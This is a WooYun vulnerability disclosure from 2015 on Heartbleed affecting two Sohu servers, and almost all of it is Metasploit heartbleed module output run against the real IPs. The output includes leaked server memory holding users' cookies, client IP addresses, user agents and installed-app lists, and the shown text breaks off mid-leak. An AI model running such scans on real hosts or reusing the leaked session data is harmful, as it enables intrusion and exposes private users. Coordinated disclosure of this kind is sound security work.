当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116318

漏洞标题:搜狐两处心脏滴血漏洞

相关厂商:搜狐

漏洞作者:

提交时间:2015-05-26 17:33

修复时间:2015-07-10 18:36

公开时间:2015-07-10 18:36

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-26: 细节已通知厂商并且等待厂商处理中
2015-05-26: 厂商已经确认,细节仅向厂商公开
2015-06-05: 细节向核心白帽子及相关领域专家公开
2015-06-15: 细节向普通白帽子公开
2015-06-25: 细节向实习白帽子公开
2015-07-10: 细节向公众公开

简要描述:

*

详细说明:

地址分别是:
http://123.125.123.24/views/login.html
http://123.125.123.130/views/login.html
搜狐应用投放中心
貌似是做了负载均衡吧,两个站是一样的
123.125.123.24

[*] 123.125.123.24:443 - Sending Client Hello...
[!] SSL record #1:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 86
[!] Handshake #1:
[!] Length: 82
[!] Type: Server Hello (2)
[!] Server Hello Version: 0x0301
[!] Server Hello random data: 55643492870b926a098b55271ff48a825aec5951f45ebe19644e79389340a3bb
[!] Server Hello Session ID length: 32
[!] Server Hello Session ID: 0006a9854f93e9ee1350f336e1fe8adb100f52f6f9ff040a0a17ca89ff50d986
[!] SSL record #2:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 3331
[!] Handshake #1:
[!] Length: 3327
[!] Type: Certificate Data (11)
[!] Certificates length: 3324
[!] Data length: 3327
[!] Certificate #1:
[!] Certificate #1: Length: 1301
[!] Certificate #1: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x000000083f1b98>, issuer=#<OpenSSL::X509::Name:0x000000083f1af8>, serial=#<OpenSSL::BN:0x000000083f1a58>, not_before=2015-05-06 00:00:00 UTC, not_after=2016-05-05 23:59:59 UTC>
[!] Certificate #2:
[!] Certificate #2: Length: 1117
[!] Certificate #2: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x0000000839d728>, issuer=#<OpenSSL::X509::Name:0x0000000839d638>, serial=#<OpenSSL::BN:0x0000000839d570>, not_before=2012-08-27 20:40:40 UTC, not_after=2022-05-20 20:40:40 UTC>
[!] Certificate #3:
[!] Certificate #3: Length: 897
[!] Certificate #3: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x0000000837c280>, issuer=#<OpenSSL::X509::Name:0x0000000837c208>, serial=#<OpenSSL::BN:0x0000000837c190>, not_before=2002-05-21 04:00:00 UTC, not_after=2018-08-21 04:00:00 UTC>
[!] SSL record #3:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 525
[!] Handshake #1:
[!] Length: 521
[!] Type: Server Key Exchange (12)
[!] SSL record #4:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 4
[!] Handshake #1:
[!] Length: 0
[!] Type: Server Hello Done (14)
[*] 123.125.123.24:443 - Sending Client Hello...
[!] SSL record #1:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 86
[!] Handshake #1:
[!] Length: 82
[!] Type: Server Hello (2)
[!] Server Hello Version: 0x0301
[!] Server Hello random data: 5564349c90feffb88930b5cfd203830d658784af0a6743045aa142ba195c2aa7
[!] Server Hello Session ID length: 32
[!] Server Hello Session ID: 09b9992f1a96375d60548e4fb79a4711d06be0b5c2ba7aa051c84cbdf4669634
[!] SSL record #2:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 3331
[!] Handshake #1:
[!] Length: 3327
[!] Type: Certificate Data (11)
[!] Certificates length: 3324
[!] Data length: 3327
[!] Certificate #1:
[!] Certificate #1: Length: 1301
[!] Certificate #1: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x00000007ea7390>, issuer=#<OpenSSL::X509::Name:0x00000007ea7318>, serial=#<OpenSSL::BN:0x00000007ea72a0>, not_before=2015-05-06 00:00:00 UTC, not_after=2016-05-05 23:59:59 UTC>
[!] Certificate #2:
[!] Certificate #2: Length: 1117
[!] Certificate #2: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x00000007e4bb58>, issuer=#<OpenSSL::X509::Name:0x00000007e4bae0>, serial=#<OpenSSL::BN:0x00000007e4ba68>, not_before=2012-08-27 20:40:40 UTC, not_after=2022-05-20 20:40:40 UTC>
[!] Certificate #3:
[!] Certificate #3: Length: 897
[!] Certificate #3: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x00000007e07a20>, issuer=#<OpenSSL::X509::Name:0x00000007e078e0>, serial=#<OpenSSL::BN:0x00000007e07818>, not_before=2002-05-21 04:00:00 UTC, not_after=2018-08-21 04:00:00 UTC>
[!] SSL record #3:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 525
[!] Handshake #1:
[!] Length: 521
[!] Type: Server Key Exchange (12)
[!] SSL record #4:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 4
[!] Handshake #1:
[!] Length: 0
[!] Type: Server Hello Done (14)
[*] 123.125.123.24:443 - Sending Heartbeat...
[*] 123.125.123.24:443 - Heartbeat response, 17275 bytes
[+] 123.125.123.24:443 - Heartbeat response with leak
[*] 123.125.123.24:443 - Printable info leaked: UcG6(p|('mQr3f"!98532ED/A5E5%25BF%2583%25E9%2587%258C%25E7%259A%2584 HTTP/1.1Host api.tv.sohu.comX-Forwarded-For 120.14.157.179, 120.14.157.179Connection closeAccept-Encoding gzip,deflateUser-Agent SOHUVideo 4.0.2 (iPhone; iPhone OS 6.1.3; zh_CN)Cookie SUV=1402902605772697; vjlast=1410313541.1429479993.11; _channeled=1212120001; MTV_SRC=11060001; vjuids=-8629a8c3.1485d3cd412.0.07a1f4aesrc=1000|0001Accept-Language zh-CN,en-US;q=0.8Cookie IPLOC=CN4403; SUV=1432629574675129; MTV_SRC=1000%7C0001; _channeled=1212130001X-Requested-With com.miui.video max-age=030540746.1430540746.30; Hm_lvt_c154d502f02b12a996c34a02281a3bff=1430540746; _exposure={"94":1}; position=7; adaptor_version=3; page_version=3; hide_ad=0; MTV_SRC=1001%7C0001; _channeled=1211020100X-Requested-With com.android.browser257D%252C%257B%2522package_name%2522%253A%2522com.android.browser%2522%252C%2522version%2522%253A3%257D%252C%257B%2522package_name%2522%253A%2522com.android.calculator2%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.android.calendar%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.android.certinstaller%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.contacts%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.defcontainer%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.email%2522%252C%2522version%2522%253A410000%257D%252C%257B%2522package_name%2522%253A%2522com.android.exchange%2522%252C%2522version%2522%253A500000%257D%252C%257B%2522package_name%2522%253A%2522com.android.galaxy4%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.android.htmlviewer%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.keychain%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.magicsmoke%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.mms%2522%252C%2522version%2522%253A10107%257D%252C%257B%2522package_name%2522%253A%2522com.android.musicfx%2522%252C%2522version%2522%253A10400%257D%252C%257B%2522package_name%2522%253A%2522com.android.musicvis%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.noisefield%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.android.packageinstaller%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.phasebeam%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.android.phone%2522%252C%2522version%2522%253A10107%257D%252C%257B%2522package_name%2522%253A%2522com.android.phonenoareainquire%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.applications%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.calendar%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.contacts%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.downloads%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.drm%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.media%2522%252C%2522version%2522%253A510%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.settings%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.telephony%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.providers.userdictionary%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.provision%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.quicksearchbox%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.android.settings%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.sharedstoragebackup%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.stk%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.systemui%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.video%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.android.vpndialogs%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.wallpaper%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.wallpaper.holospiral%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.wallpaper.livepicker%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.baidu.BaiduMap%2522%252C%2522version%2522%253A320%257D%252C%257B%2522package_name%2522%253A%2522com.baidu.map.location%2522%252C%2522version%2522%253A30%257D%252C%257B%2522package_name%2522%253A%2522com.bootoptions.main%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.cat.star.soho4%2522%252C%2522version%2522%253A203%257D%252C%257B%2522package_name%2522%253A%2522com.dianping.v1%2522%252C%2522version%2522%253A531%257D%252C%257B%2522package_name%2522%253A%2522com.happyelements.AndroidAnimal%2522%252C%2522version%2522%253A20%257D%252C%257B%2522package_name%2522%253A%2522com.iflytek.speech%2522%252C%2522version%2522%253A1941%257D%252C%257B%2522package_name%2522%253A%2522com.june.game.doudizhu%2522%252C%2522version%2522%253A221%257D%252C%257B%2522package_name%2522%253A%2522com.kugou.android%2522%252C%2522version%2522%253A6145%257D%252C%257B%2522package_name%2522%253A%2522com.lenovo.anyshare%2522%252C%2522version%2522%253A4020752%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.CellConnService%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.FMRadio%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.MediatekDM%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.StkSelection%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.appguide.plugin%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.apst.target%2522%252C%2522version%2522%253A2%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.bluetooth%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.calendarimporter%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.connectivity%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.engineermode%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.mtklogger%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.omacp%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.smsreg%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.theme.mint%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.theme.mocha%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.theme.raspberry%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.mediatek.ygps%2522%252C%2522version%2522%253A2%257D%252C%257B%2522package_name%2522%253A%2522com.nearme.gamecenter%2522%252C%2522version%2522%253A322%257D%252C%257B%2522package_name%2522%253A%2522com.nearme.note%2522%252C%2522version%2522%253A223%257D%252C%257B%2522package_name%2522%253A%2522com.nearme.pay%2522%252C%2522version%2522%253A220%257D%252C%257B%2522package_name%2522%253A%2522com.nearme.statistics.rom%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.nearme.sync%2522%252C%2522version%2522%253A9%257D%252C%257B%2522package_name%2522%253A%2522com.netease.pris%2522%252C%2522version%2522%253A24%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.LockNow%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.LockScreenGlassBoard%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.LockScreenWeather%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.OppoPasswordUnlock%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.OppoPatternUnlock%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.OppoSimUnlockScreen%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.activation%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.autotest%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.c2u%2522%252C%2522version%2522%253A3%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.camera%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.card%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.community%2522%252C%2522version%2522%253A30302%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.disclock%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.dlna%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.engineermode%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.entranceguard%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.entranceguardservice%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.filemanager%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.findmyphone%2522%252C%2522version%2522%253A4%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.findphonegps.service%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.ftpfileshare%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.gallery3d%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.individualservice%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.individuationSettings%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.launcher%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.launcher.system%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.lockmanager%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.manageapplication%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.market%2522%252C%2522version%2522%253A221%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.music%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.netframework%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.newsimdetect%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.operationManual%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.ota%2522%252C%2522version%2522%253A2%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.photoeditor%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.popup%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.powermanager%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.privacyprotect%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.purebackground%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.reader%2522%252C%2522version%2522%253A200%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.safe%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.service.account%2522%252C%2522version%2522%253A120%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.speechassist%2522%252C%2522version%2522%253A2%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.theme.theme%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.theme.theme.default%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.theme.theme1%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.theme.theme2%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.theme.theme3%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.usb%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.usercenter%2522%252C%2522version%2522%253A143%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.wallpaper%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.weather%2522%252C%2522version%2522%253A30301%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.weather.locationservice%2522%252C%2522version%2522%253A10201%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.widget.calendar%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.widget.digitalclock%2522%252C%2522version%2522%253A9%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.widget.monitor%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.widget.musicpage%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.widget.picture%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.widget.powermanager%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.oppo.widget.smallweather%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.sohu.inputmethod.sogou%2522%252C%2522version%2522%253A137%257D%252C%257B%2522package_name%2522%253A%2522com.sohu.sohuvideo%2522%252C%2522version%2522%253A4610%257D%252C%257B%2522package_name%2522%253A%2522com.storm.smart%2522%252C%2522version%2522%253A3944%257D%252C%257B%2522package_name%2522%253A%2522com.svox.pico%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.tencent.mm%2522%252C%2522version%2522%253A261%257D%252C%257B%2522package_name%2522%253A%2522com.tencent.mtt%2522%252C%2522version%2522%253A420430%257D%252C%257B%2522package_name%2522%253A%2522com.tencent.peng%2522%252C%2522version%2522%253A14%257D%252C%257B%2522package_name%2522%253A%2522oppo.multimedia.soundrecorder%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522org.cocos2dx.FishingJoy2%2522%252C%2522version%2522%253A105%257D%255D%252C%2522download_size%2522%253A103394%252C%2522downloaded%2522%253A%255B%257B%2522package_name%2522%253A%2522com.duokan.reader%2522%252C%2522version%2522%253A345%257D%252C%257B%2522package_name%2522%253A%2522com.duokan.reader%2522%252C%2522version%2522%253A348%257D%252C%257B%2522package_name%2522%253A%2522com.moyogame.conan.SOHUWAN%2522%252C%2522version%2522%253A113%257D%255D%257D&partner=85&icsson.eventstream%2522%252C%2522version%2522%253A8388616%257D%252C%257B%2522package_name%2522%253A%2522com.sonyericsson.eventstream.facebookplugin%2522%252C%2522version%2522%253A8388622%257D%252C%257B%2522package_name%2522%253A%2522com.sonyericsson.eventstream.twitterplugin%2522%252C%2522version%2522%253A8388622%257D%252@C%257B%2522package_name%2522%253A%2522com.sonyericsson.eventstream.twitterpostviewer%2522%252C%2522version%2522%253A4194315%257D%252C%257B%2522package_name%2522%253A%2522com.sonyericsson.extras.liveware%2522%252C%2522version%2522%253A50710110%257D%252C%257B%2522package_name%2522%253A%2522com.sonyericsson.extras.smarttags%2522%252C%2522version%2522%253A1109%257D%252C%257B%2522package_name%2522%253A%2522com.sonyericsson.facebook.postview%2522%252C%2522version%2522%253A4194316%257D%252C%257B%2522package_name%2522%253A%2522com.sonyericsson.facebook.proxylogin%2522%252C%2522version%2522%253A6291471%257D%252C%257B%2522package_name%2522%253A%2522com.sonyericsson.fbmediadiscovery%2522%252C%2522version%2522%253A8388624%257D%252C%257B%2522package_name%2522%253A%2522com.sonyericsson.fmradio%2522%252C%2522version%2522%253A6291464%257D%252C%257B%2522package_name%2522%253A%2522com.sonyer
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(openssl_heartbleed) > Interrupt: use the 'exit' command to quit
msf auxiliary(openssl_heartbleed) >


123.125.123.130

[*] 123.125.123.130:443 - Sending Client Hello...
[!] SSL record #1:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 86
[!] Handshake #1:
[!] Length: 82
[!] Type: Server Hello (2)
[!] Server Hello Version: 0x0301
[!] Server Hello random data: 556436a551413fb8d4e8c8776c32f08832743968482550644f0272a1b5668e96
[!] Server Hello Session ID length: 32
[!] Server Hello Session ID: 52068502fb6c5f4b5f05f382b4a2a4db2b6aa1fa3a5a57230c0aa49fdaa5a1fb
[!] SSL record #2:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 3331
[!] Handshake #1:
[!] Length: 3327
[!] Type: Certificate Data (11)
[!] Certificates length: 3324
[!] Data length: 3327
[!] Certificate #1:
[!] Certificate #1: Length: 1301
[!] Certificate #1: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x00000009464430>, issuer=#<OpenSSL::X509::Name:0x00000009464390>, serial=#<OpenSSL::BN:0x00000009464110>, not_before=2015-05-06 00:00:00 UTC, not_after=2016-05-05 23:59:59 UTC>
[!] Certificate #2:
[!] Certificate #2: Length: 1117
[!] Certificate #2: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x00000006ee6960>, issuer=#<OpenSSL::X509::Name:0x00000006ee68e8>, serial=#<OpenSSL::BN:0x00000006ee6848>, not_before=2012-08-27 20:40:40 UTC, not_after=2022-05-20 20:40:40 UTC>
[!] Certificate #3:
[!] Certificate #3: Length: 897
[!] Certificate #3: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x000000064b8ad8>, issuer=#<OpenSSL::X509::Name:0x000000064b8948>, serial=#<OpenSSL::BN:0x000000064b8858>, not_before=2002-05-21 04:00:00 UTC, not_after=2018-08-21 04:00:00 UTC>
[!] SSL record #3:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 525
[!] Handshake #1:
[!] Length: 521
[!] Type: Server Key Exchange (12)
[!] SSL record #4:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 4
[!] Handshake #1:
[!] Length: 0
[!] Type: Server Hello Done (14)
[*] 123.125.123.130:443 - Sending Client Hello...
[!] SSL record #1:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 86
[!] Handshake #1:
[!] Length: 82
[!] Type: Server Hello (2)
[!] Server Hello Version: 0x0301
[!] Server Hello random data: 556436af9f06f2f665ddf42e1021ddeae6589d817240d627093748a9f68071b8
[!] Server Hello Session ID length: 32
[!] Server Hello Session ID: a17891ea01e68b221ba796d97357e6fe5932b7c2575d765fe55e1663df46afaf
[!] SSL record #2:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 3331
[!] Handshake #1:
[!] Length: 3327
[!] Type: Certificate Data (11)
[!] Certificates length: 3324
[!] Data length: 3327
[!] Certificate #1:
[!] Certificate #1: Length: 1301
[!] Certificate #1: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x0000000bdf11e0>, issuer=#<OpenSSL::X509::Name:0x0000000bdf1168>, serial=#<OpenSSL::BN:0x0000000bdf10f0>, not_before=2015-05-06 00:00:00 UTC, not_after=2016-05-05 23:59:59 UTC>
[!] Certificate #2:
[!] Certificate #2: Length: 1117
[!] Certificate #2: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x0000000bd27b10>, issuer=#<OpenSSL::X509::Name:0x0000000bd27a70>, serial=#<OpenSSL::BN:0x0000000bd279f8>, not_before=2012-08-27 20:40:40 UTC, not_after=2022-05-20 20:40:40 UTC>
[!] Certificate #3:
[!] Certificate #3: Length: 897
[!] Certificate #3: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x00000005bc6628>, issuer=#<OpenSSL::X509::Name:0x00000005bc6588>, serial=#<OpenSSL::BN:0x00000005bc6510>, not_before=2002-05-21 04:00:00 UTC, not_after=2018-08-21 04:00:00 UTC>
[!] SSL record #3:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 525
[!] Handshake #1:
[!] Length: 521
[!] Type: Server Key Exchange (12)
[!] SSL record #4:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 4
[!] Handshake #1:
[!] Length: 0
[!] Type: Server Hello Done (14)
[*] 123.125.123.130:443 - Sending Heartbeat...
[*] 123.125.123.130:443 - Heartbeat response, 17275 bytes
[+] 123.125.123.130:443 - Heartbeat response with leak
[*] 123.125.123.130:443 - Printable info leaked: UcGW("L_Wf"!98532ED/ATP/1.1Host api.tv.sohu.comX-Forwarded-For 115.61.54.67, 115.61.54.67Connection closeAccept-Encoding gzip,deflateReferer http://m.tv.sohu.com/v1011780.shtml?channeled=1211010100Accept-Language zh-CNUser-Agent Mozilla/5.0 (Linux; U; Android 4.0.3; zh-CN; X909 Build/JRO03L) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 UCBrowser/10.0.0.488 U3/0.8.0 Mobile Safari/533.1Cookie _smuid=UsSsWtI6oCjNI0MTplWfBJ; IPLOC=CN3707; SUV=1420683936213936; _trans_=000016_ucweb; adaptor_version=3; page_version=3; hide_ad=0; MTV_SRC=1006%7C0001; _channeled=1211010100Accept */*RC=1001%7C0001; _channeled=1200140006x-up-bear-type TD-SCDMAx-source-id 10.166.253.2Via ZXWAP GateWay,ZTE Technologies22package_name%2522%253A%2522com.android.browser%2522%252C%2522version%2522%253A13%257D%252C%257B%2522package_name%2522%253A%2522com.android.calculator2%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.android.calendar%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.android.certinstaller%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.android.contacts%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.android.defcontainer%2522%252C%2522version%2522%253A0%257D%252C%257B%2522package_name%2522%253A%2522com.android.dreams.basic%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.dreams.phototable%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.email%2522%252C%2522version%2522%253A410000%257D%252C%257B%2522package_name%2522%253A%2522com.android.exchange%2522%252C%2522version%2522%253A410000%257D%252C%257B%2522package_name%2522%253A%2522com.android.facelock%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.galaxy4%2522%252C%2522version%2522%253A1%257D%252C%257B%2522package_name%2522%253A%2522com.android.htmlviewer%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.keychain%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.location.fused%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.magicsmoke%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%253A%2522com.android.mms%2522%252C%2522version%2522%253A10107%257D%252C%257B%2522package_name%2522%253A%2522com.android.musicfx%2522%252C%2522version%2522%253A10400%257D%252C%257B%2522package_name%2522%253A%2522com.android.musicvis%2522%252C%2522version%2522%253A17%257D%252C%257B%2522package_name%2522%